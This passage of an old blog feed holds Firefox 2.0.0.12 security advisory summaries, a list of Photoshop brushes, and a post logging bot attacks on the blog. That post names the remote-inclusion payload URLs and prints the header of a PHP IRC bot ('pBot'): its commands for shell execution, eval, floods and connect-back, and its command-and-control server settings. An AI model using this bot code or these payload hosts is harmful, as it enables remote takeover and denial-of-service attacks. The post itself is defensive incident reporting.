<p>Security researchers <em>Emil Ljungdahl</em> and <em>Lars-Olof Moilanen</em> demonstrated that, in cases where the entire contents of a page are enclosed in a <tt class="di">&lt;div&gt;</tt> with absolute positioning, a web forgery warning dialog won&#8217;t be displayed unless the user switches tabs away-from then back-to the forgery page.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a rel="nofollow" class="exturl icn-r1" title="Web forgery warning not shown until tab switch" href="https://bugzilla.mozilla.org/show_bug.cgi?id=408164">Web forgery warning not shown until tab switch</a>
</li>
<li><a rel="nofollow" class="exturl icn-r1" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0594">National Vulnerability Database (NVD) - CVE-2008-0594</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 low" href="http://www.mozilla.org/security/announce/2008/mfsa2008-10.html">MFSA 2008-10</a></dt>
<dd>
<h3 class="title- mg-">URL token stealing via stylesheet redirect</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Security researcher <em>Martin Straka</em> reported that <strong>Gecko-based browsers</strong> update the <tt class="di">.href</tt> property of stylesheet DOM nodes to reflect the final URI of the stylesheet after following any 302 redirects (much as the <tt class="di">document.location</tt> property is updated). This differs from other browsers and could potentially reveal sensitive URL parameters, such as those used by Single-signon sytems, to scripts on the page.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="Stylesheet href property shows redirected URL unlike other browsers" href="https://bugzilla.mozilla.org/show_bug.cgi?id=397427">Stylesheet href property shows redirected URL unlike other browsers</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0593">National Vulnerability Database (NVD) - CVE-2008-0593</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 low" href="http://www.mozilla.org/security/announce/2008/mfsa2008-09.html">MFSA 2008-09</a></dt>
<dd>
<h3 class="title- mg-">Mishandling of locally-saved plain text files</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Mozilla contributor <em>oo.rio.oo</em> demonstrated that once a file with <tt class="di">Content-Disposition: attachment</tt> and (improper) <tt class="di">Content-Type: plain/text</tt> is saved locally, the browser would no longer open local files with <tt class="di">.txt</tt> extensions for viewing, but would rather prompt the user to save the file.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="plain text txt file viewing capability lost after having downloaded a txt file" href="https://bugzilla.mozilla.org/show_bug.cgi?id=387258">plain text txt file viewing capability lost after having downloaded a txt file with content-disposition: attachment and content-type: plain/text</a></li>
<li>
<a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0592">National Vulnerability Database (NVD) - CVE-2008-0592</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 moderate" href="http://www.mozilla.org/security/announce/2008/mfsa2008-08.html">MFSA 2008-08</a></dt>
<dd>
<h3 class="title- mg-">File action dialog tampering</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Security researcher <em>Michal Zalewski</em> demonstrated that timer-enabled security dialogs can be subverted by attackers using JavaScript to change the window focus. Zalewski showed that a user could be tricked into confirming a security dialog of this type by bringing the dialog back into focus right before a user clicked in a predictable time and place.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="file action dialog controls vulnerable to refocus race" href="https://bugzilla.mozilla.org/show_bug.cgi?id=376473">file action dialog controls vulnerable to refocus race</a></li>
<li>
<a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0591">National Vulnerability Database (NVD) - CVE-2008-0591</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 critical" href="http://www.mozilla.org/security/announce/2008/mfsa2008-06.html">MFSA 2008-06</a></dt>
<dd>
<h3 class="title- mg-">Web browsing history and forward navigation stealing</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Mozilla contributor <em>David Bloom</em> reported a vulnerability in the way images are treated by the browser when a user leaves a page which utilizes <tt class="di">designMode</tt> frames. The reported issue can be used to steal a user&#8217;s navigation history, forward navigation information, and crash the user&#8217;s browser. The crash showed evidence of memory corruption and might be exploitable to run arbitrary code.<br />
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="Vulnerability allows script to see where user is headed, sniff history, and crash nsDocShell::Destroy() the browser too" href="https://bugzilla.mozilla.org/show_bug.cgi?id=400556">Vulnerability allows script to see where user is headed, sniff history, and crash [@ nsDocShell::Destroy()] the browser too</a></li>
<li>
<a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0419">National Vulnerability Database (NVD) - CVE-2008-0419</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 high" href="http://www.mozilla.org/security/announce/2008/mfsa2008-05.html">MFSA 2008-05</a></dt>
<dd>
<h3 class="title- mg-">Directory traversal via chrome: URI</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p><em>Gerry Eisenhaur</em> reported the chrome: URI scheme improperly allowed directory traversal that could be used to load JavaScript, images, and stylesheets from local files in known locations. This traversal was possible only when the browser had installed add-ons which used &#8220;flat&#8221; packaging rather than the more popular .jar packaging, and the attacker would need to target that specific add-on.</p>
<p>Mozilla researcher <strong>moz_bug_r_a4</strong> reported that this vulnerability could be used to steal the contents of the browser&#8217;s <tt class="di">sessionstore.js</tt> file, which contains session cookie data and information about currently open web pages.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="Allows to steal data from sessionstore.js" href="https://bugzilla.mozilla.org/show_bug.cgi?id=413451">Allows to steal data from sessionstore.js</a></li>
<li><a class="exturl icn-r1" title="chrome directory traversal (local disk access via flat addons)" href="https://bugzilla.mozilla.org/show_bug.cgi?id=413250">chrome directory traversal (local disk access via &#8220;flat&#8221; addons)</a></li>
<li><a class="exturl icn-r1" title="list of flat packaged add-ons" href="https://bugzilla.mozilla.org/attachment.cgi?id=300181">list of &#8220;flat&#8221; packaged add-ons</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0418">National Vulnerability Database (NVD) - CVE-2008-0418</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 moderate" href="http://www.mozilla.org/security/announce/2008/mfsa2008-04.html">MFSA 2008-04</a></dt>
<dd>
<h3 class="title- mg-">Stored password corruption</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Mozilla developer <em>Justin Dolske</em> discovered that malicious sites, upon a user saving his or her password, could inject newlines into Firefox&#8217;s password store and corrupt saved passwords for other sites.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="Content can corrupt stored passwords by injecting line breaks" href="https://bugzilla.mozilla.org/show_bug.cgi?id=394610">Content can corrupt stored passwords by injecting line breaks</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0417">National Vulnerability Database (NVD) - CVE-2008-0417</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 critical" href="http://www.mozilla.org/security/announce/2008/mfsa2008-03.html">MFSA 2008-03</a></dt>
<dd>
<h3 class="title- mg-">Privilege escalation, XSS, Remote Code Execution</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Mozilla contributors <strong>moz_bug_r_a4</strong> and <em>Boris Zbarsky</em> submitted a series of vulnerabilities which allow scripts from page content to escape from its sandboxed context and/or run with chrome privileges. An additional vulnerability reported by <tt class="di">moz_bug_r_a4</tt> demonstrated that the <tt class="di">XMLDocument.load()</tt> function can be used to inject script into another site, violating the browser&#8217;s same-origin policy.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="List of JavaScript privilege escalation bugs" href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=386695,393761,393762,399298,407289,372075,363597">List of JavaScript privilege escalation bugs</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0415">National Vulnerability Database (NVD) - CVE-2008-0415</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 moderate" href="http://www.mozilla.org/security/announce/2008/mfsa2008-02.html">MFSA 2008-02</a></dt>
<dd>
<h3 class="title- mg-">Multiple file input focus stealing vulnerabilities</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Security researchers <em>hong</em> and <em>Gregory Fleisher</em> each reported a variant on earlier reported bugs regarding focus shifting in file input controls. Their variants used file input controls nested inside <tt class="di">&lt;label&gt;</tt> tags to take advantage of automatic focus shifting into the file input field noted on the Hacker WebZine. As with the earlier reported issues this issue could be used to force a user to upload arbitrary files assuming the attacker knows the full path and name of the file.</p>
<p>These bugs are variations on earlier problems reported by <em>Charles McAuley</em> and <em>Michal Zalewski</em> which were fixed in <strong>Firefox 2.0.0.4</strong>, as well as an issue reported by hong which was fixed in <strong>Firefox 2.0.0.8</strong>.<br />
Gregory Fleisher also submitted a series of demonstrations of different ways to lure a user to place focus into the file input control manually. These demonstrations included &#8220;focus spoofing&#8221; by selectively capturing keystrokes and placing the captured characters where the user thinks the focus should be.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="List Focus shifting bugs" href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=404451,408034,404391,405299">List of Focus shifting bugs</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0414">National Vulnerability Database (NVD) - CVE-2008-0414</a></li>
</ul>
</div>
</dd>
<dt><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 critical" href="http://www.mozilla.org/security/announce/2008/mfsa2008-01.html">MFSA 2008-01</a></dt>
<dd>
<h3 class="title- mg-">Crashes with evidence of memory corruption (rv:1.8.1.12)</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
<p>Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox 2.0.0.12 and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.</p>
<p class="notice">Thunderbird shares the browser engine with Firefox and could be vulnerable if JavaScript were to be enabled in mail. This is not the default setting and we strongly discourage users from running JavaScript in mail. Without further investigation we cannot rule out the possibility that for some of these an attacker might be able to prepare memory for exploitation through some means other than JavaScript such as large images.</p>
<h4 class="mgt b1s b1b b1c-gray">References</h4>
<ul>
<li><a class="exturl icn-r1" title="JavaScript Engine Crashes" href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=407720,390597,373344,398085,406572,391028,406036,402087">List of JavaScript Engine Crashes</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0413">National Vulnerability Database (NVD) - CVE-2008-0413</a></li>
<li><a class="exturl icn-r1" title="Browser Crashes" href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=398088,393141,364801,346405,396613,394337,406290">List of Browser Crashes Bugs</a></li>
<li><a class="exturl icn-r1" rel="nofollow" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0412">National Vulnerability Database (NVD) - CVE-2008-0412</a></li>
</ul>
</div>
</dd>
</dl>
<h2 class="cb">Thunderbird Security Release</h2>
<p>Thunderbird 2.0.0.12 is schedule to be release on <a href="http://wiki.mozilla.org/Releases/Thunderbird_2.0.0.12">February 28</a>. </p>
<h2>External Links</h2>
<ul>
<li><a class="exturl icn-r1" href="http://www.mozilla.com/en-US/firefox/all.html">Download Firefox 2.0.0.12</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/firefox/firefox-20012-security-release/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Selected Photoshop Brushes</title>
		<link>http://42.kaizeku.com/adobe/photoshop/selected-photoshop-brushes/</link>
		<comments>http://42.kaizeku.com/adobe/photoshop/selected-photoshop-brushes/#comments</comments>
		<pubDate>Thu, 07 Feb 2008 15:08:18 +0000</pubDate>
		<dc:creator>Deviant Ninja</dc:creator>
		
		<category><![CDATA[Photoshop]]></category>

		<category><![CDATA[Resources]]></category>

		<category><![CDATA[abr]]></category>

		<category><![CDATA[brushes]]></category>

		<category><![CDATA[curly]]></category>

		<category><![CDATA[floral]]></category>

		<category><![CDATA[handwriting]]></category>

		<category><![CDATA[lotr]]></category>

		<category><![CDATA[resources]]></category>

		<category><![CDATA[splatter]]></category>

		<category><![CDATA[swirls]]></category>

		<category><![CDATA[tolkien]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/adobe/photoshop/selected-photoshop-brushes/</guid>
		<description><![CDATA[

Popular Adobe Photoshop Brushes from deviantART resources for January 2008.

Photoshop Brushes

Floral Photoshop Brushes III - by GraphicIdentity License: Creative Commons Attribution-Noncommercial-Share Alike 3.0
AR - PS Brushes - Curls &#38; Swirls - by AngelinaArt License: Angelina&#8217;s Resource TOC
Spray Paint High Res Splatter Brushes - by Jay K License: Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 License.
High Res [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>Popular Adobe <strong>Photoshop Brushes</strong> from <a class="exturl icn-r" href="http://browse.deviantart.com/resources/applications/psbrushes/?order=9&amp;startts=1199692800&amp;endts=1202371200">deviantART resources</a> for January 2008.<br />
<span id="more-179"></span></p>
<h2 class="cb">Photoshop Brushes</h2>
<ol id="adobe-photoshop-brushes list" class="xoxo cf">
<li class="vcard cf mgb"><img class="db fl photo span-4" src='http://blog.kakkoi.net/wp-content/uploads/2008/02/fantasy-floral-photoshop-brushes.thumbnail.jpg' alt='fantasy floral photoshop brushes abr' width='128' height='128' longdesc='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/fantasy-floral-photoshop-brushes.jpg' /><a class="exturl icn-r uid" href="http://graphic-identity.blogspot.com/2008/01/fantasy-floral-photoshop-brushes-part-3.html"><strong>Floral Photoshop Brushes III</strong></a> - by <a href="http://graphic-identity.blogspot.com" class="url fn microformat icn-r"><span class="nickname">GraphicIdentity</span></a> <small>License: <a href="http://creativecommons.org/licenses/by-nc-sa/3.0/" title="This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 License." rel="cc-license license">Creative Commons Attribution-Noncommercial-Share Alike 3.0</a></small></li>
<li class="vcard cf cl mgt mgb"><img class="db fl photo span-4" src='http://blog.kakkoi.net/wp-content/uploads/2008/02/curls-swirls-photoshop-brushes-angelinaart.thumbnail.jpg' alt='curls swirls photoshop brushes abr angelinaart' width='128' height='108' longdesc='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/curls-swirls-photoshop-brushes-angelinaart.jpg' /><a class="exturl icn-r uid" href="http://angelinaresource.deviantart.com/art/AR-PS-Brushes-Curls-and-Sw-74949838"><strong>AR - PS Brushes - Curls &amp; Swirls</strong></a> - by <a href="http://angelinaart.deviantart.com" class="url fn microformat icn-r"><span class="nickname">AngelinaArt</span></a> <small>License: <a href="http://resource.angelinaart.com/terms.html" rel="license">Angelina&#8217;s Resource TOC</a></small></li>
<li class="vcard cf cl mgt mgb"><img class="db fl photo span-4" src='http://blog.kakkoi.net/wp-content/uploads/2008/02/spray-paint-splatter-photoshop-brushes-high-res.thumbnail.jpg' alt='spray paint splatter photoshop brushes high res' width='128' height='128' longdesc='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/spray-paint-splatter-photoshop-brushes-high-res.jpg' /><a class="exturl icn-r uid" href="http://itsj2o.deviantart.com/art/Spray-Paint-Splatter-Brushes-74544652"><strong>Spray Paint High Res Splatter Brushes</strong></a> - by <a href="http://itsj2o.deviantart.com" class="url fn microformat icn-r"><span class="nickname">Jay K</span></a> <small>License: <a href="http://creativecommons.org/licenses/by-nc-nd/3.0/" rel="cc-license license">Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 License.</a></small></li>
<li class="vcard cf cl mgt mgb"><img class="db fl photo span-4" src='http://blog.kakkoi.net/wp-content/uploads/2008/02/high-res-photoshop-floral-brushes_pack.thumbnail.jpg' alt='high res photoshop floral brushes pack' width='128' height='128' longdesc='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/high-res-photoshop-floral-brushes_pack.jpg' /><a class="exturl icn-r uid" href="http://atenaispd.deviantart.com/art/Brushes-Pack-001-76154804"><strong>High Res Floral Brushes Pack</strong></a> - by <a href="http://atenaispd.deviantart.com" class="url fn microformat icn-r"><span class="given-name">Liudmila</span> <span class="family-name">Metaeva</span></a> <small>License: <a class="ref" href="http://atenaispd.deviantart.com/journal/16667004/" rel="license"><span class="nickname">Atenaispd</span>&#8217;s TOC.</a></small></li>
<li class="vcard cf cl mgt mgb"><img class="db fl photo span-4" src='http://blog.kakkoi.net/wp-content/uploads/2008/02/tolkien-handwriting-photoshop-brushes.thumbnail.jpg' alt='tolkien lotr lord of the rings handwriting text photoshop brushes' width='128' height='128' longdesc='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/tolkien-handwriting-photoshop-brushes.jpg' /><a class="exturl icn-r uid" href="http://amarieveanne-stock.deviantart.com/art/Tolkien-s-handwriting-brushes-75242421"><strong>Tolkien&#8217;s Handwriting Brushes</strong></a> - by <a href="http://amarieveanne.deviantart.com" class="url fn microformat icn-r"><span class="given-name">Amarië</span> <span class="family-name">Vëannë</span></a> <small>License: <a class="ref" href="http://creativecommons.org/licenses/by-nc-sa/3.0/" rel="license cc-license">Creative Commons Attribution-Noncommercial-Share Alike 3.0 License.</a></small></li>
<li class="vcard cf cl mgt mgb"><img class="db fl photo span-4" src='http://blog.kakkoi.net/wp-content/uploads/2008/02/light-streaks-abstract-photoshop-brushes.thumbnail.jpg' alt='light streaks abstract photoshop brushes' width='128' height='95' longdesc='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/light-streaks-abstract-photoshop-brushes.jpg' /><a class="exturl icn-r uid" href="http://comicanton.deviantart.com/art/Light-Streaks-Brushes-74281396"><strong>Light Streaks Abstract Brushes</strong></a> - by <a href="http://comicanton.deviantart.com/" class="url fn microformat icn-r"><span class="nickname">comicanton</span></a> <small>License: <a class="ref" href="http://creativecommons.org/licenses/by-nc-sa/3.0/" rel="license cc-license">Creative Commons Attribution-Noncommercial-Share Alike 3.0 License.</a></small></li>
<li class="vcard cf cl mgt mgb"><img class="db fl photo span-4" src='http://blog.kakkoi.net/wp-content/uploads/2008/02/web-20-photoshop-brushes.thumbnail.jpg' alt='curls swirls photoshop brushes abr angelinaart' width='128' height='58' longdesc='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/web-20-photoshop-brushes.jpg' /><a class="exturl icn-r uid" href="http://www.adamwoodhouse.co.uk/?p=23"><strong>Web 2.0 Effect Brushes</strong></a> - by by <a href="http://www.adamwoodhouse.co.uk/" class="url fn microformat icn-r"><span class="given-name">Adam</span> <span class="family-name">Woodhouse</span></a> <small>License: <a href="http://ardcor.deviantart.com/journal/13365152/" rel="license">Ardcor&#8217;s TOC Donationware</a></small></li>
</ol>
<p class="cb notice">Notice: Do read the brush author <abbr title="Terms and Conditions">TOC</abbr> &#038; Licenses, give credit where is due.</p>
<h2 class="cb">External Links</h2>
<ul>
<li><a class="exturl icn-r" href="http://browse.deviantart.com/resources/applications/psbrushes/?order=9&#038;startts=1199692800&#038;endts=1202371200">deviantART Resources &raquo; Photoshop Brushes &raquo; Previous Month</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/adobe/photoshop/selected-photoshop-brushes/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/#comments</comments>
		<pubDate>Wed, 06 Feb 2008 22:59:53 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[googlebot]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</guid>
		<description><![CDATA[

 Today&#8217;s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &#8595;. The first attacker is from 212.24.62.200 &#8594; udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> Today&#8217;s we just upgrade from <strong>WordPress 2.3.2</strong> to <strong>2.3.3 security release</strong>. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &darr;. The first attacker is from 212.24.62.200 &rarr; udkado.ru masking their useragent as <strong>Googlebot</strong> (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort. </p>
<p>The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of <abbr title="Dynamic Domain Name Server">DDNS</abbr> (china &rarr; korea &rarr; us ). Noticeably the scans pattern is predictable. From our <a href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Feb 5th attack</a> all these botnet is targeting certain search keywords <em>security, injection</em> so we setup a honey-pot right on that particular URL.<br />
<span id="more-189"></span></p>
<h2>Hacking Attempts on Kakkoi</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=212.24.62.200" class="exturl icn-r" rel="nofollow">212.24.62.200</a></small></td>
<td><small><a href="http://www.useragentstring.com/pages/Googlebot/">Googlebot</a></small></td>
<td>1</td>
<td><small><a href="http://api.hostip.info/?ip=212.24.62.200" class="exturl icn-r" rel="nofollow">Russia</a></small></td>
<td>
<ul class="xoxo r">
<li><small>www.yahoo.com</small></li>
<li><small>Request URI: <a href="/uri/d3d3LnlhaG9vLmNvbQ.curie,80,302" rev="curie:302" title="Yahoo!">www.yahoo.com</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=61.152.158.46" class="exturl icn-r" rel="nofollow">61.152.158.46</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=61.152.158.46" class="exturl icn-r" rel="nofollow">China</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td>
<ol class="xoxo r">
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.88.3.47" class="exturl icn-r" rel="nofollow">85.88.3.47</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=74.205.123.49" class="exturl icn-r" rel="nofollow">74.205.123.49</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=210.205.6.161" class="exturl icn-r" rel="nofollow">210.205.6.161</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=207.44.246.45" class="exturl icn-r" rel="nofollow">207.44.246.45</a></small></li>
</ol>
</td>
<td>N/A</td>
<td>16</td>
<td>
<ol class="xoxo r">
<li><small><a href="http://api.hostip.info/?ip=85.88.3.47" class="exturl icn-r" rel="nofollow">Germany</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=74.205.123.49" class="exturl icn-r" rel="nofollow">US</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=210.205.6.161" class="exturl icn-r" rel="nofollow">Korea</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=207.44.246.45" class="exturl icn-r" rel="nofollow">US</a></small></li>
</ol>
</td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>The Bot-herder Host</h2>
<p>Part of class <strong>pBot</strong> source taken from <tt class="di">http://basiclifesaving.org/mycomments/rom.txt</tt></p>
<pre class="prebox">
&lt;? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ &lt;admin@xdevil.org&gt;
 *
 * COMMANDS:
 *
 * .user &lt;password&gt; //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail &lt;to&gt; &lt;from&gt; &lt;subject&gt; &lt;msg&gt; //send an email
 * .dns &lt;IP|HOST&gt; //dns lookup
 * .download &lt;URL&gt; &lt;filename&gt; //download a file
 * .exec &lt;cmd&gt; // uses exec() //execute a command
 * .sexec &lt;cmd&gt; // uses shell_exec() //execute a command
 * .cmd &lt;cmd&gt; // uses popen() //execute a command
 * .info //get system information
 * .php &lt;php code&gt; // uses eval() //execute php code
 * .tcpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;port&gt; &lt;delay&gt; //tcpflood attack
 * .udpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;delay&gt; //udpflood attack
 * .raw &lt;cmd&gt; //raw IRC command
 * .rndnick //change nickname
 * .pscan &lt;host&gt; &lt;port&gt; //port scan
 * .safe // test safe_mode (dvl)
 * .inbox &lt;to&gt; // test inbox (dvl)
 * .conback &lt;ip&gt; &lt;port&gt; // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo &quot;Ok unlocker. We did i!&quot;;

class pBot
{
 var $config = array(&quot;server&quot;=&gt;&quot;Bucharest.ro.eu.ultra-chat.org&quot;,
 &quot;port&quot;=&gt;&quot;6667&quot;,
 &quot;pass&quot;=&gt;&quot;n&quot;,
 &quot;prefix&quot;=&gt;&quot;[R]&quot;,
 &quot;maxrand&quot;=&gt;&quot;4&quot;,
 &quot;chan&quot;=&gt;&quot;#unlocker&quot;,
 &quot;chan2&quot;=&gt;&quot;#unlocker&quot;,
 &quot;key&quot;=&gt;&quot;n&quot;,
 &quot;modes&quot;=&gt;&quot;+p&quot;,
 &quot;password&quot;=&gt;&quot;n&quot;,
 &quot;trigger&quot;=&gt;&quot;.&quot;,
 &quot;hostauth&quot;=&gt;&quot;Robert.users.ultra-chat.org&quot; // * for any hostname (remember: /setvhost xdevil.org)
 );
</pre>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</a></li>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Dynamic_DNS">Dynamic DNS</a></li>
</ul>
